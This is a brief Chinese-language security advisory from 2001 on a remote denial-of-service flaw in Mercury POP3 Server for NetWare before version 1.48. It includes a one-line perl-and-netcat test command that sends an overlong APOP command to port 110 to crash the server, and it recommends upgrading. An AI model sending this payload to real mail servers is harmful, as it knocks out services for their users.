基于NetWare平台Mercury POP3 Server 存在远程拒绝服务攻击发布时间:2001-04-25 更新时间:2001-04-25 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Mercury 1.48之前版本详细描述 Mercury Mail(http://www.pmail.com/overviews/ovw_mercury.htm) 是MAIL服务程序,其中远程用户可以通过发送超长的APOP命令 可以导致服务器崩溃。 测试代码 perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110 解决方案 升级到最新版本 version 1.48. 相关信息 |
